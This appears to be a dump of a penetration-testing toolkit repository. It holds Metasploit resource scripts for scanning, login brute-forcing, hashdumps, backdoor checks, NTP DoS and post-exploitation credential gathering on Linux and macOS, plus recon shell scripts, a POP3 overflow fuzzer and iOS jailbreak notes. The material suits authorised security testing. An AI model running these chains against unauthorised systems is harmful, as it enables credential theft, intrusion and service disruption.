auxiliary/scanner/smtp/smtp_relay 15 | run 16 | -------------------------------------------------------------------------------- /resource/502-scada.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 502 4 | 5 | use auxiliary/scanner/scada/modbusclient 6 | run 7 | 8 | use auxiliary/scanner/scada/modbusdetect 9 | run 10 | 11 | use auxiliary/scanner/scada/modbus_banner_grabbing 12 | run 13 | 14 | use auxiliary/scanner/scada/modbus_findunitid 15 | run 16 | -------------------------------------------------------------------------------- /resource/1433-mssql.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 1433 4 | 5 | use scanner/mssql/mssql_ping 6 | run 7 | 8 | use scanner/mssql/mssql_login 9 | set PASS-FILE /usr/share/wordlists/fasttrack.txt 10 | run 11 | 12 | use scanner/mssql/mssql_hashdump 13 | run 14 | 15 | use scanner/mssql/mssql_schemadump 16 | run 17 | -------------------------------------------------------------------------------- /notes/Python/discover/recon/salesforce.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import os 4 | 5 | # variables 6 | colorBlue = "\033[01;34m{0}\033[00m" 7 | 8 | ############################################################################################################## 9 | 10 | os.system("clear") 11 | banner() 12 | 13 | print "Salesforce" 14 | print 15 | print 16 | sys.exit(0) 17 | -------------------------------------------------------------------------------- /notes/mobile.txt: -------------------------------------------------------------------------------- 1 | Mobile App Testing for iOS 2 | 3 | 4 | iOS 7.1.1 5 | Pangu Jailbreak 1.2.0 6 | http://cydiainstaller.net/download/install-cydia-ios-7-1-to-7-1-2/ 7 | 8 | Cydia 9 | Run updates 10 | Install 11 | OpenSSH 12 | iFile 13 | Apple File Conduit 2 14 | 15 | ssh root@ 16 | password: alpine 17 | 18 | iExplorer $35 19 | www.macroplant.com/iexplorer 20 | -------------------------------------------------------------------------------- /resource/http.rc: -------------------------------------------------------------------------------- 1 | setg DOMAIN 2 | setg HTTPBL_APIKEY 3 | setg PATH_SAVE /root 4 | setg RANGE 5 | setg RHOST 6 | setg RHOSTS 7 | setg SQLMAP_PATH /pentest/database/sqlmap 8 | setg THREADS 255 9 | setg VULNCSV 10 | 11 | ipidseq # from ip 12 | 13 | lotus_domino_hashes # from lotus 14 | lotus_domino_login # from lotus 15 | lotus_domino_version # from lotus 16 | -------------------------------------------------------------------------------- /resource/5432-postgres.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5432 4 | 5 | use auxiliary/scanner/postgres/postgres_version 6 | run 7 | 8 | use auxiliary/scanner/postgres/postgres_login 9 | run 10 | 11 | use auxiliary/scanner/postgres/postgres_hashdump 12 | run 13 | 14 | use auxiliary/scanner/postgres/postgres_dbname_flag_injection 15 | run 16 | 17 | use auxiliary/scanner/postgres/postgres_schemadump 18 | run 19 | -------------------------------------------------------------------------------- /resource/22-ssh.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 22 4 | 5 | use auxiliary/scanner/ssh/ssh_version 6 | run 7 | 8 | use auxiliary/scanner/ssh/detect_kippo 9 | run 10 | 11 | use auxiliary/scanner/ssh/eaton_xpert_backdoor 12 | run 13 | 14 | use auxiliary/scanner/ssh/fortinet_backdoor 15 | run 16 | 17 | use auxiliary/scanner/ssh/juniper_backdoor 18 | run 19 | 20 | use auxiliary/scanner/ssh/libssh_auth_bypass 21 | run 22 | -------------------------------------------------------------------------------- /resource/1521-oracle.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 1521 4 | 5 | use auxiliary/scanner/oracle/tnslsnr_version 6 | run 7 | 8 | use auxiliary/scanner/oracle/oracle_hashdump 9 | run 10 | 11 | use auxiliary/scanner/oracle/oracle_login 12 | run 13 | 14 | use auxiliary/scanner/oracle/sid_brute 15 | run 16 | 17 | use auxiliary/scanner/oracle/sid_enum 18 | run 19 | 20 | use auxiliary/scanner/oracle/tnspoison_checker 21 | run 22 | -------------------------------------------------------------------------------- /report/data/hosts.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Reporting Framework 7 | 8 | 9 | 10 | 11 | 12 | 13 | 
14 | 


--------------------------------------------------------------------------------
/report/data/doc.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/emails.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/names.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/pdf.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/ppt.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/txt.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/waf.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/xls.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/misc/netblocks.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/bash
 2 | 
 3 | clear
 4 | echo
 5 | echo "Netblocks"
 6 | echo
 7 | echo
 8 | echo "By Lee Baird"
 9 | echo
10 | echo "This returns a list of Class A owners and takes about 100 sec."
11 | echo
12 | 
13 | for x in `seq 1 255`; do
14 |      whois $x.0.0.0 | egrep '(CIDR|OrgName)' >> tmp
15 |      echo >> tmp
16 | done
17 | 
18 | egrep -v '(%|No address)' tmp > tmp2
19 | cat -s tmp2 > netblocks.txt
20 | 
21 | rm tmp*
22 | 
23 | echo
24 | echo
25 | 


--------------------------------------------------------------------------------
/report/data/records.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/squatting.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/subdomains.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/traceroute.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/whatweb.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/whois-ip.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/active-recon.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/passive-recon.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/whois-domain.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/zonetransfer.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/certificates.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 

15 | 
16 | 


--------------------------------------------------------------------------------
/resource/6000-5-x11.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | 
 4 | use auxiliary/scanner/x11/open_x11
 5 | set RPORT 6000
 6 | run
 7 | 
 8 | use auxiliary/scanner/x11/open_x11
 9 | set RPORT 6001
10 | run
11 | 
12 | use auxiliary/scanner/x11/open_x11
13 | set RPORT 6002
14 | run
15 | 
16 | use auxiliary/scanner/x11/open_x11
17 | set RPORT 6003
18 | run
19 | 
20 | use auxiliary/scanner/x11/open_x11
21 | set RPORT 6004
22 | run
23 | 
24 | use auxiliary/scanner/x11/open_x11
25 | set RPORT 6005
26 | run
27 | 


--------------------------------------------------------------------------------
/notes/Python/ex1.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | import os
 4 | import sys
 5 | 
 6 | os.system("clear")
 7 | 
 8 | port = raw_input("\nEnter a valid port: ")
 9 | 
10 | if port == "":
11 |      print "\nYou did not enter anything.\n\n"
12 |      sys.exit(1)
13 | 
14 | try:
15 |      val = int(port)
16 | except ValueError:
17 |      print("\nThat is not an number.\n\n")
18 |      sys.exit(1)
19 | 
20 | if int(port) not in range(1,65535):
21 |      print "\nThat is an invalid port.\n\n"
22 | else:
23 |      print "\nThat is a valid port.\n\n"
24 | 


--------------------------------------------------------------------------------
/resource/post-osx.rc:
--------------------------------------------------------------------------------
 1 | run post/osx/gather/apfs_encrypted_volume_passwd
 2 | run post/osx/gather/autologin_password
 3 | run post/osx/gather/enum_adium
 4 | run post/osx/gather/enum_airport
 5 | run post/osx/gather/enum_chicken_vnc_profile
 6 | run post/osx/gather/enum_colloquy
 7 | run post/osx/gather/enum_keychain
 8 | run post/osx/gather/enum_messages
 9 | run post/osx/gather/enum_osx
10 | run post/osx/gather/hashdump
11 | run post/osx/gather/password_prompt_spoof
12 | run post/osx/gather/safari_lastsession
13 | run post/osx/gather/vnc_password_osx
14 | 


--------------------------------------------------------------------------------
/resource/123-udp-ntp.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 123
 4 | 
 5 | use auxiliary/scanner/ntp/ntp_monlist
 6 | run
 7 | 
 8 | use auxiliary/scanner/ntp/ntp_nak_to_the_future
 9 | run
10 | 
11 | use auxiliary/scanner/ntp/ntp_peer_list_dos
12 | run
13 | 
14 | use auxiliary/scanner/ntp/ntp_peer_list_sum_dos
15 | run
16 | 
17 | use auxiliary/scanner/ntp/ntp_readvar
18 | run
19 | 
20 | use auxiliary/scanner/ntp/ntp_req_nonce_dos
21 | run
22 | 
23 | use auxiliary/scanner/ntp/ntp_reslist_dos
24 | run
25 | 
26 | use auxiliary/scanner/ntp/ntp_unsettrap_dos
27 | run
28 | 


--------------------------------------------------------------------------------
/resource/21-ftp.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 21
 4 | 
 5 | use auxiliary/scanner/ftp/ftp_version
 6 | run
 7 | 
 8 | use auxiliary/scanner/ftp/anonymous
 9 | run
10 | 
11 | use auxiliary/scanner/ftp/bison_ftp_traversal
12 | run
13 | 
14 | use auxiliary/scanner/ftp/colorado_ftp_traversal
15 | run
16 | 
17 | use auxiliary/scanner/ftp/easy_file_sharing_ftp
18 | run
19 | 
20 | use auxiliary/scanner/ftp/konica_ftp_traversal
21 | run
22 | 
23 | use auxiliary/scanner/ftp/pcman_ftp_traversal
24 | run
25 | 
26 | use auxiliary/scanner/ftp/titanftp_xcrc_traversal
27 | run
28 | 


--------------------------------------------------------------------------------
/report/data/registered-domains.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | Run Domain > Find registered domains.
16 | Paste the results here.
17 | 

18 | 
19 | 


--------------------------------------------------------------------------------
/config/vimrc:
--------------------------------------------------------------------------------
 1 | 
 2 | set number                         " Show line numbers
 3 | syntax on                          " Syntax highlighting
 4 | 
 5 | set ignorecase                     " Search is case-insensitive
 6 | set hlsearch                       " Highlight search matches
 7 | set incsearch                      " Highlight first matches of searches while typing
 8 | 
 9 | set expandtab                      " Insert spaces instead of tabs
10 | set shiftwidth=5                   " Tab = 5 spaces
11 | set softtabstop=5                  " Tab = 5 spaces
12 | set backspace=indent,eol,start     " Modern backspace behavior
13 | 
14 | 


--------------------------------------------------------------------------------
/resource/9100-printers.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 9100
 4 | 
 5 | use auxiliary/scanner/printer/printer_version_info
 6 | run
 7 | 
 8 | use auxiliary/scanner/printer/printer_delete_file
 9 | run
10 | 
11 | use auxiliary/scanner/printer/printer_download_file
12 | run
13 | 
14 | use auxiliary/scanner/printer/printer_upload_file
15 | run
16 | 
17 | use auxiliary/scanner/printer/printer_env_vars
18 | run
19 | 
20 | use auxiliary/scanner/printer/printer_list_dir
21 | run
22 | 
23 | use auxiliary/scanner/printer/printer_list_volumes
24 | run
25 | 
26 | use auxiliary/scanner/printer/printer_ready_message
27 | run
28 | 


--------------------------------------------------------------------------------
/resource/recon-ng-active.rc:
--------------------------------------------------------------------------------
 1 | modules load recon/domains-hosts/mx_spf_ip
 2 | run
 3 | modules load recon/netblocks-hosts/reverse_resolve
 4 | run
 5 | modules load recon/hosts-hosts/resolve
 6 | run
 7 | modules load recon/hosts-hosts/reverse_resolve
 8 | run
 9 | 
10 | db query UPDATE hosts SET host = LOWER(host)
11 | 
12 | db query DELETE FROM hosts WHERE host NOT LIKE '%.yyy%'
13 | 
14 | spool start /tmp/subdomains-active
15 | db query SELECT DISTINCT host,ip_address FROM hosts WHERE host IS NOT NULL ORDER BY host ASC
16 | db query SELECT DISTINCT host,ip_address FROM ports WHERE host IS NOT NULL ORDER BY host ASC
17 | spool stop
18 | 
19 | exit
20 | 


--------------------------------------------------------------------------------
/misc/rebrand.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/bash
 2 | 
 3 | echo
 4 | echo -n "Enter the location of your folder: "
 5 | read -e location
 6 | 
 7 | # Check for no answer
 8 | if [[ -z $location ]]; then
 9 |      echo 'No answer.'
10 |      echo
11 |      exit
12 | fi
13 | 
14 | # Check for wrong answer
15 | if [ ! $location ]; then
16 |      echo 'Wrong location.'
17 |      echo
18 |      exit
19 | fi
20 | 
21 | cd $location
22 | 
23 | sed -i 's|href="https://github.com/leebaird/discover"|href="https://www.acme.org"|g' index.htm
24 | cd pages/
25 | sed -i 's|href="https://github.com/leebaird/discover"|href="https://www.acme.org"|g' *.htm
26 | 
27 | firefox ../index.htm &
28 | 


--------------------------------------------------------------------------------
/misc/dns-transfer.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/bash
 2 | 
 3 | clear
 4 | echo
 5 | echo "DNS Transfer"
 6 | echo
 7 | echo
 8 | echo "By Lee Baird"
 9 | echo
10 | echo "Check for DNS zone transfer."
11 | echo
12 | echo "Usage: target.com"
13 | echo
14 | 
15 | read -p "Domain: " domain
16 | 
17 | if [ -z $domain ]; then
18 |      echo
19 |      echo "========================================"
20 |      echo
21 |      echo "Invalid choice."
22 |      echo
23 |      echo
24 |      exit
25 | fi
26 | 
27 | echo
28 | echo "========================================"
29 | echo
30 | 
31 | for x in $(host -t ns $domain | cut -d ' ' -f4); do
32 |      host -l $domain $x
33 | done
34 | 
35 | echo
36 | echo
37 | 


--------------------------------------------------------------------------------
/misc/ping-sweep.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/bash
 2 | 
 3 | clear
 4 | echo
 5 | echo "PIng Sweep"
 6 | echo
 7 | echo
 8 | echo "By Lee Baird"
 9 | echo
10 | echo "Ping sweep a Class C."
11 | echo
12 | echo "Usage: 192.168.1"
13 | echo
14 | 
15 | read -p "Class: " class
16 | 
17 | if [ -z $class ]; then
18 |      echo
19 |      echo "========================================"
20 |      echo
21 |      echo "Invalid choice."
22 |      echo
23 |      echo
24 |      exit
25 | fi
26 | 
27 | echo
28 | echo "========================================"
29 | echo
30 | 
31 | for x in `seq 1 254`; do
32 |      ping -c1 $class.$x | grep 'bytes from' | cut -d ' ' -f4 | cut -d ':' -f1 &
33 | done
34 | 
35 | echo
36 | echo
37 | 


--------------------------------------------------------------------------------
/misc/dns-reverse.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/bash
 2 | 
 3 | clear
 4 | echo
 5 | echo "DNS Reverse"
 6 | echo
 7 | echo
 8 | echo "By Lee Baird"
 9 | echo
10 | echo "Perform a PTR DNS query on a Class C range and return FQDNs."
11 | echo
12 | echo "Usage: 192.168.1"
13 | echo
14 | 
15 | read -p "Class: " class
16 | 
17 | if [ -z $class ]; then
18 |      echo
19 |      echo "========================================"
20 |      echo
21 |      echo "Invalid choice."
22 |      echo
23 |      echo
24 |      exit
25 | fi
26 | 
27 | echo
28 | echo "========================================"
29 | echo
30 | 
31 | for x in `seq 1 254`; do
32 |      host $class.$x | grep 'name pointer' | cut -d ' ' -f1,5
33 | done
34 | 
35 | echo
36 | echo
37 | 


--------------------------------------------------------------------------------
/misc/subdomains-from-ssl.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/bash
 2 | 
 3 | clear
 4 | echo
 5 | echo
 6 | echo -n "Enter a domain: "
 7 | read domain
 8 | 
 9 | # Check for no answer
10 | if [[ -z $domain ]]; then
11 |      echo
12 |      echo "[!] You didn't enter a domain."
13 |      echo
14 |      echo
15 |      exit
16 | fi
17 | 
18 | sslyze $domain --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers > tmp
19 | 
20 | grep 'X509v3 Subject Alternative Name:' tmp | sed 's/      X509v3 Subject Alternative Name:   //g' | sed 's/, DNS:/\n/g' | sed 's/www.//g' | sed 's/DNS://g' > tmp2
21 | 
22 | # Remove trailing whitespace from each line
23 | sed 's/[ \t]*$//' tmp2 | sort -u > tmp3
24 | 
25 | echo
26 | cat tmp3
27 | rm tmp*
28 | echo
29 | echo
30 | 


--------------------------------------------------------------------------------
/misc/dns-forward.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/bash
 2 | 
 3 | clear
 4 | echo
 5 | echo "DNS Forward"
 6 | echo
 7 | echo
 8 | echo "By Lee Baird"
 9 | echo
10 | echo "Show IP addresses of subdomains."
11 | echo
12 | echo "Usage: target.com"
13 | echo
14 | 
15 | read -p "Domain: " domain
16 | 
17 | if [ -z $domain ]; then
18 |      echo
19 |      echo "========================================"
20 |      echo
21 |      echo "Invalid choice."
22 |      echo
23 |      echo
24 |      exit
25 | fi
26 | 
27 | echo
28 | echo "========================================"
29 | echo
30 | 
31 | for x in $(cat /usr/share/dnsenum/dns.txt); do
32 |      host $x.$domain | grep 'has address' | cut -d ' ' -f1,4 >> tmp
33 | done
34 | 
35 | column -t tmp | sort -u
36 | 
37 | rm tmp
38 | 
39 | echo
40 | echo
41 | 


--------------------------------------------------------------------------------
/directObjectRef.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/bash
 2 | 
 3 | clear
 4 | f_banner
 5 | 
 6 | echo -e "${BLUE}Using Burp, authenticate to a site, map & Spider, then log out.${NC}"
 7 | echo -e "${BLUE}Target > Site map > select the URL > right click > Copy URLs in${NC}"
 8 | echo -e "${BLUE}this host. Paste the results into a new file.${NC}"
 9 | 
10 | f_location
11 | 
12 | for i in $(cat $location); do
13 |      curl -sk -w "%{http_code} - %{url_effective} \\n" "$i" -o /dev/null 2>&1 | tee -a tmp
14 | done
15 | 
16 | cat tmp | sort -u > DirectObjectRef.txt
17 | mv DirectObjectRef.txt $home/data/DirectObjectRef.txt
18 | rm tmp
19 | 
20 | echo
21 | echo $medium
22 | echo
23 | echo "***Scan complete.***"
24 | echo
25 | echo
26 | echo -e "The new report is located at ${YELLOW}$home/data/DirectObjectRef.txt${NC}\n"
27 | 


--------------------------------------------------------------------------------
/resource/post-linux.rc:
--------------------------------------------------------------------------------
 1 | run post/linux/gather/checkcontainer
 2 | run post/linux/gather/checkvm
 3 | run post/linux/gather/ecryptfs_creds
 4 | run post/linux/gather/enum_commands
 5 | run post/linux/gather/enum_configs
 6 | run post/linux/gather/enum_network
 7 | run post/linux/gather/enum_protections
 8 | run post/linux/gather/enum_psk
 9 | run post/linux/gather/enum_system
10 | run post/linux/gather/enum_users_history
11 | run post/linux/gather/enum_xchat
12 | run post/linux/gather/gnome_commander_creds
13 | run post/linux/gather/gnome_keyring_dump
14 | run post/linux/gather/hashdump
15 | run post/linux/gather/mount_cifs_creds
16 | run post/linux/gather/openvpn_credentials
17 | run post/linux/gather/phpmyadmin_credsteal
18 | run post/linux/gather/pptpd_chap_secrets
19 | run post/linux/gather/tor_hiddenservices
20 | 


--------------------------------------------------------------------------------
/notes/ssl.txt:
--------------------------------------------------------------------------------
 1 | SSL
 2 | 
 3 |  
 4 | Redirect
 5 | Examine the response of a 301 message or Javascript.
 6 | curl -vvvv http://target.com
 7 | ------------------------------------------------------------------------------------------------------------------------------------------------------
 8 | 
 9 | Renegotiating (NULL-SHA or NULL-MD5)
10 | 
11 | sslscan --no-failed 
12 | 
13 | sslscan --no-failed --targets=443.txt
14 | 
15 | openssl s_client -connect target:443
16 | 
17 | telnet  443
18 | GET / HTTP/1.0
19 | R
20 | ------------------------------------------------------------------------------------------------------------------------------------------------------
21 | 
22 | cat 443.txt | while read IP port; do echo "----START "$IP":"$port"----"; echo -e "HEAD / HTTP/1.0\nR\n\n" | ncat --ssl "$IP" "$port"; echo -e "\$
23 | 


--------------------------------------------------------------------------------
/resource/445-smb.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 445
 4 | 
 5 | use auxiliary/scanner/dcerpc/petitpotam
 6 | run
 7 | 
 8 | use auxiliary/scanner/smb/pipe_auditor
 9 | run
10 | 
11 | use auxiliary/scanner/smb/pipe_dcerpc_auditor
12 | run
13 | 
14 | use auxiliary/scanner/smb/psexec_loggedin_users
15 | run
16 | 
17 | use auxiliary/scanner/smb/smb_enum_gpp
18 | run
19 | 
20 | use auxiliary/scanner/smb/smb_enumshares
21 | run
22 | 
23 | use auxiliary/scanner/smb/smb_enumusers
24 | run
25 | 
26 | use auxiliary/scanner/smb/smb_enumusers_domain
27 | run
28 | 
29 | use auxiliary/scanner/smb/smb_login
30 | run
31 | 
32 | use auxiliary/scanner/smb/smb_lookupsid
33 | set MaxRID 1025
34 | run
35 | 
36 | use auxiliary/scanner/smb/smb_ms17_010
37 | run
38 | 
39 | use auxiliary/scanner/smb/smb_uninit_cred
40 | run
41 | 
42 | use auxiliary/scanner/smb/smb_version
43 | run
44 | 


--------------------------------------------------------------------------------
/misc/crawl.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/bash
 2 | 
 3 | clear
 4 | echo
 5 | echo "Crawl"
 6 | echo
 7 | echo
 8 | echo "By Lee Baird"
 9 | echo
10 | echo "Find all of the subdomains linked to the homepage."
11 | echo
12 | echo "Usage: target.com"
13 | echo
14 | 
15 | read -p "Domain: " domain
16 | 
17 | if [ -z $domain ]; then
18 |      echo
19 |      echo "========================================"
20 |      echo
21 |      echo "Invalid choice."
22 |      echo
23 |      echo
24 |      exit
25 | fi
26 | 
27 | echo
28 | echo "========================================"
29 | echo
30 | 
31 | wget -q www.$domain
32 | 
33 | if [ ! -e index.html ]; then
34 |      echo
35 |      exit
36 | fi
37 | 
38 | grep 'href=' index.html | cut -d '/' -f3 | grep $domain | egrep -v "(www.$domain|>)" | cut -d '"' -f1 | sort -u > tmp
39 | 
40 | if [ ! -s tmp ]; then
41 |      echo 'No subdomains found.'
42 | else
43 |      cat tmp | sort -u | column -t 2>/dev/null
44 | fi
45 | 
46 | rm index.html tmp*
47 | 
48 | echo
49 | echo
50 | 


--------------------------------------------------------------------------------
/notes/Python/test.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | import os
 4 | 
 5 | os.system("clear")
 6 | 
 7 | f = open("tmp","r")                                # Setup a read connection to file
 8 | filedata = f.read()                                # Read the file
 9 | f.close()                                          # Close the connection
10 | filedata = filedata.split("\n")                    # Turn into a list
11 | 
12 | ##############################
13 | 
14 | out = []                                           # Create an empty array
15 | 
16 | for i in filedata:
17 |      if "@" in i:                                  # grep '@'
18 |           if not "apples" in i:                    # grep -v 'apples'
19 |                out.append(i.lower())               # Append to array and change to lower case
20 | 
21 | out = list(set(out))                               # Make list unique
22 | out.sort()                                         # Sort
23 | 
24 | for j in out:
25 |      print j
26 | 


--------------------------------------------------------------------------------
/notes/Python/fuzzer-pop3.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | import os
 4 | import socket
 5 | 
 6 | os.system("clear")
 7 | 
 8 | # Create an array of buffers from 10 to 2000, with increments of 20.
 9 | buffer=["A"]
10 | counter=100
11 | 
12 | while len(buffer) <= 30:
13 |      buffer.append("A"*counter)
14 |      counter=counter+200
15 | 
16 | for string in buffer:
17 |      print "\n\nFuzzing PASS with %s bytes." % len(string)
18 | 
19 |      s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
20 |      connect=s.connect(("172.16.181.135",110))    # Connect to IP on port 110.
21 | 
22 |      s.recv(1024)                                 # Receive reply.
23 |      s.send("USER test\r\n")                      # Send username 'test'.
24 |      s.recv(1024)                                 # Receive reply.
25 |      s.send("PASS " + string + "\r\n")            # Send password 'PASS' plus random buffer.
26 |      s.send("QUIT\r\n")                           # Send command 'QUIT'.
27 |      s.close()                                    # Close socket.
28 | 


--------------------------------------------------------------------------------
/notes/consulting.txt:
--------------------------------------------------------------------------------
 1 | Consulting
 2 | 
 3 | 
 4 | # Backpack
 5 |      Update your VMs and tools.
 6 |      Power strip and extension chord.
 7 |      4 port switch.
 8 |      25’ CAT6 cable.
 9 |      (2) 6’ CAT6 cables.
10 |      (2) USB C ethernet adapters.
11 | 
12 | # Dress
13 |      No hats or sunglasses inside.
14 |      Shave
15 |      Long hair should be slicked back in a ponytail.
16 |      Shirt - pressed button up, one button from the top, tucked in.
17 |      Pants - pressed, belt, no jeans.
18 |      Shoes - shined.
19 | 
20 | # Set expectations up front
21 |      Number of days.
22 |      Start, lunch, and stop times.
23 |      Status updates.
24 |      Deliverable.
25 | 
26 | # Know your environment
27 |      Location of bathroom.
28 |      People will be watching AND listening.
29 |      Leave your area clean.
30 | 
31 | # Client
32 |      Treat them with respect (yes sir, no ma’am).
33 |      Be responsive.
34 |      Control the client and the engagement, don’t let them control you.
35 |      Beware hovering.
36 |      You are not there to teach.
37 | 


--------------------------------------------------------------------------------
/notes/snmp.txt:
--------------------------------------------------------------------------------
 1 | SNMP
 2 | 
 3 | 
 4 | # Default or Guessable SNMP Community Strings
 5 | 
 6 | onesixtyone -c  -i 161.txt
 7 | 
 8 | snmpcheck -t  
 9 | ------------------------------------------------------------------------------------------------------------------------------------------------------
10 | 
11 | # Management Information Bases (MIB) Tree
12 | 
13 | 1.3.6.1.2.1.25.1.6.0       System processes
14 | 1.3.6.1.2.1.25.4.2.1.2     Running programs
15 | 1.3.6.1.2.1.25.4.2.1.4     Processes path
16 | 1.3.6.1.2.1.25.2.3.1.4     Storeage units
17 | 1.3.6.1.2.1.25.6.3.1.2     Software name
18 | 1.3.6.1.4.1.77.1.2.25      Windows user accounts
19 | 1.3.6.1.2.1.6.13.1.3       Windows TCP ports
20 | 
21 | # Read-only Community String of 'public'
22 | 
23 | snmpwalk -c public -v1  
24 | ------------------------------------------------------------------------------------------------------------------------------------------------------
25 | 
26 | # Modify a variable
27 | 
28 | snmpset -v  -c    s ""
29 | 


